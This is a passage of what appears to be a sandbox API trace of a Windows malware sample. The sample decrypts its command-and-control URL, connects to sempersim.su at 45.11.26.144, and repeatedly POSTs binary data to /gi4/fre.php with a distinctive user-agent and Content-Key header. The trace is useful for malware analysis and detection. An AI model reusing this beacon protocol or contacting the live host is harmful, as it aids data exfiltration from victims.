LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0295.351] CryptImportKey (in: hProv=0x5c5aa8, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0295.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0295.352] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0295.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0295.353] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0295.353] GetProcessHeap () returned 0x5b0000 [0295.354] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0295.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0295.355] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3158, pdwDataLen=0xdfcfc | out: pbData=0x5d3158, pdwDataLen=0xdfcfc) returned 1 [0295.355] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0295.356] CryptDestroyKey (hKey=0x5be288) returned 1 [0295.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0295.357] CryptReleaseContext (hProv=0x5c5aa8, dwFlags=0x0) returned 1 [0295.357] GetProcessHeap () returned 0x5b0000 [0295.357] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5b38 [0295.358] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0295.358] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0295.359] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0295.359] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0295.362] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0295.363] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0295.363] GetProcessHeap () returned 0x5b0000 [0295.363] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0295.363] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cde80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf3c8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0295.365] GetProcessHeap () returned 0x5b0000 [0295.365] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa40 [0295.365] socket (af=2, type=1, protocol=6) returned 0x408 [0295.365] connect (s=0x408, name=0x5cf3c8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0295.434] FreeAddrInfoW (pAddrInfo=0x5cde80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf3c8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0295.434] GetProcessHeap () returned 0x5b0000 [0295.434] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5cc8 [0295.434] GetProcessHeap () returned 0x5b0000 [0295.434] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0295.435] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0295.436] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0295.436] GetProcessHeap () returned 0x5b0000 [0295.436] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0295.436] GetProcessHeap () returned 0x5b0000 [0295.437] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0295.437] GetProcessHeap () returned 0x5b0000 [0295.437] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3350 [0295.437] GetProcessHeap () returned 0x5b0000 [0295.437] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0295.438] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0295.439] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0295.439] GetProcessHeap () returned 0x5b0000 [0295.439] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0295.439] GetProcessHeap () returned 0x5b0000 [0295.440] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0295.440] send (s=0x408, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0295.440] send (s=0x408, buf=0x5d1e18*, len=159, flags=0) returned 159 [0295.440] GetProcessHeap () returned 0x5b0000 [0295.440] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0295.440] recv (in: s=0x408, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0297.011] GetProcessHeap () returned 0x5b0000 [0297.012] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0297.012] GetProcessHeap () returned 0x5b0000 [0297.012] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3350 | out: hHeap=0x5b0000) returned 1 [0297.012] GetProcessHeap () returned 0x5b0000 [0297.013] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0297.013] GetProcessHeap () returned 0x5b0000 [0297.013] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5cc8 | out: hHeap=0x5b0000) returned 1 [0297.013] closesocket (s=0x408) returned 0 [0297.014] GetProcessHeap () returned 0x5b0000 [0297.014] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa40 | out: hHeap=0x5b0000) returned 1 [0297.014] GetProcessHeap () returned 0x5b0000 [0297.015] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5b38 | out: hHeap=0x5b0000) returned 1 [0297.015] GetProcessHeap () returned 0x5b0000 [0297.015] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3158 | out: hHeap=0x5b0000) returned 1 [0297.015] GetProcessHeap () returned 0x5b0000 [0297.016] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0297.016] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xcd8) returned 0x408 [0297.018] Sleep (dwMilliseconds=0xea60) [0297.032] GetProcessHeap () returned 0x5b0000 [0297.032] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3038 [0297.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0297.034] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0297.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0297.042] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5dd8) returned 1 [0297.054] GetProcessHeap () returned 0x5b0000 [0297.054] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8590 [0297.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0297.055] CryptImportKey (in: hProv=0x5c5dd8, pbData=0x5c8590, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0297.056] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0297.056] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0297.057] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0297.057] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0297.057] GetProcessHeap () returned 0x5b0000 [0297.057] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8590 | out: hHeap=0x5b0000) returned 1 [0297.058] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0297.058] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3038, pdwDataLen=0xdfcfc | out: pbData=0x5d3038, pdwDataLen=0xdfcfc) returned 1 [0297.059] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0297.059] CryptDestroyKey (hKey=0x5bde08) returned 1 [0297.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0297.060] CryptReleaseContext (hProv=0x5c5dd8, dwFlags=0x0) returned 1 [0297.060] GetProcessHeap () returned 0x5b0000 [0297.060] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0297.061] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0297.061] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0297.066] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0297.067] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0297.067] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0297.068] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0297.068] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0297.069] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0297.069] GetProcessHeap () returned 0x5b0000 [0297.069] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0297.069] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0297.069] GetProcessHeap () returned 0x5b0000 [0297.069] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0297.069] GetProcessHeap () returned 0x5b0000 [0297.070] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0297.070] GetProcessHeap () returned 0x5b0000 [0297.070] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3038 | out: hHeap=0x5b0000) returned 1 [0297.070] GetProcessHeap () returned 0x5b0000 [0297.070] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2fa8 [0297.071] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0297.072] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0297.081] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0297.082] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5aa8) returned 1 [0297.087] GetProcessHeap () returned 0x5b0000 [0297.087] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8620 [0297.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0297.089] CryptImportKey (in: hProv=0x5c5aa8, pbData=0x5c8620, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0297.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0297.092] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0297.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0297.093] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0297.093] GetProcessHeap () returned 0x5b0000 [0297.093] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8620 | out: hHeap=0x5b0000) returned 1 [0297.094] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0297.094] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2fa8, pdwDataLen=0xdfcfc | out: pbData=0x5d2fa8, pdwDataLen=0xdfcfc) returned 1 [0297.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0297.095] CryptDestroyKey (hKey=0x5be048) returned 1 [0297.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0297.096] CryptReleaseContext (hProv=0x5c5aa8, dwFlags=0x0) returned 1 [0297.096] GetProcessHeap () returned 0x5b0000 [0297.096] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5b38 [0297.096] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0297.097] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0297.097] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0297.097] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0297.098] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0297.098] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0297.098] GetProcessHeap () returned 0x5b0000 [0297.098] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb128 [0297.098] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdd18*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0297.100] GetProcessHeap () returned 0x5b0000 [0297.100] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8d0 [0297.100] socket (af=2, type=1, protocol=6) returned 0x40c [0297.100] connect (s=0x40c, name=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0297.170] FreeAddrInfoW (pAddrInfo=0x5cdd18*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0297.170] GetProcessHeap () returned 0x5b0000 [0297.170] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5a20 [0297.170] GetProcessHeap () returned 0x5b0000 [0297.170] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0297.171] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0297.172] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0297.172] GetProcessHeap () returned 0x5b0000 [0297.172] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0297.172] GetProcessHeap () returned 0x5b0000 [0297.173] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0297.173] GetProcessHeap () returned 0x5b0000 [0297.173] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d34b8 [0297.173] GetProcessHeap () returned 0x5b0000 [0297.173] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0297.174] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0297.174] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0297.174] GetProcessHeap () returned 0x5b0000 [0297.174] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0297.174] GetProcessHeap () returned 0x5b0000 [0297.175] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0297.175] send (s=0x40c, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0297.175] send (s=0x40c, buf=0x5d1e18*, len=159, flags=0) returned 159 [0297.176] GetProcessHeap () returned 0x5b0000 [0297.176] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0297.176] recv (in: s=0x40c, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0298.464] GetProcessHeap () returned 0x5b0000 [0298.465] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0298.465] GetProcessHeap () returned 0x5b0000 [0298.465] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d34b8 | out: hHeap=0x5b0000) returned 1 [0298.465] GetProcessHeap () returned 0x5b0000 [0298.465] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0298.465] GetProcessHeap () returned 0x5b0000 [0298.466] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5a20 | out: hHeap=0x5b0000) returned 1 [0298.466] closesocket (s=0x40c) returned 0 [0298.467] GetProcessHeap () returned 0x5b0000 [0298.467] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8d0 | out: hHeap=0x5b0000) returned 1 [0298.467] GetProcessHeap () returned 0x5b0000 [0298.467] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5b38 | out: hHeap=0x5b0000) returned 1 [0298.467] GetProcessHeap () returned 0x5b0000 [0298.467] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2fa8 | out: hHeap=0x5b0000) returned 1 [0298.467] GetProcessHeap () returned 0x5b0000 [0298.468] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb128 | out: hHeap=0x5b0000) returned 1 [0298.468] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xcdc) returned 0x40c [0298.470] Sleep (dwMilliseconds=0xea60) [0298.488] GetProcessHeap () returned 0x5b0000 [0298.488] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d31e8 [0298.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0298.489] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0298.495] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0298.495] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5dd8) returned 1 [0298.504] GetProcessHeap () returned 0x5b0000 [0298.504] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8650 [0298.505] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0298.505] CryptImportKey (in: hProv=0x5c5dd8, pbData=0x5c8650, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0298.506] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0298.506] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0298.506] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0298.507] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0298.507] GetProcessHeap () returned 0x5b0000 [0298.509] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8650 | out: hHeap=0x5b0000) returned 1 [0298.509] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0298.510] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d31e8, pdwDataLen=0xdfcfc | out: pbData=0x5d31e8, pdwDataLen=0xdfcfc) returned 1 [0298.510] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0298.511] CryptDestroyKey (hKey=0x5be048) returned 1 [0298.511] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0298.512] CryptReleaseContext (hProv=0x5c5dd8, dwFlags=0x0) returned 1 [0298.512] GetProcessHeap () returned 0x5b0000 [0298.512] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d63d8 [0298.513] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0298.513] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0298.514] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0298.514] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0298.515] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0298.516] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0298.519] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0298.519] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0298.519] GetProcessHeap () returned 0x5b0000 [0298.519] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0298.519] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0298.519] GetProcessHeap () returned 0x5b0000 [0298.520] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0298.520] GetProcessHeap () returned 0x5b0000 [0298.520] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d63d8 | out: hHeap=0x5b0000) returned 1 [0298.520] GetProcessHeap () returned 0x5b0000 [0298.521] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d31e8 | out: hHeap=0x5b0000) returned 1 [0298.521] GetProcessHeap () returned 0x5b0000 [0298.521] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2fa8 [0298.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0298.522] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0298.528] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0298.528] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0298.538] GetProcessHeap () returned 0x5b0000 [0298.538] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0298.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0298.539] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0298.540] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0298.540] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0298.541] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0298.541] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0298.541] GetProcessHeap () returned 0x5b0000 [0298.542] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0298.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 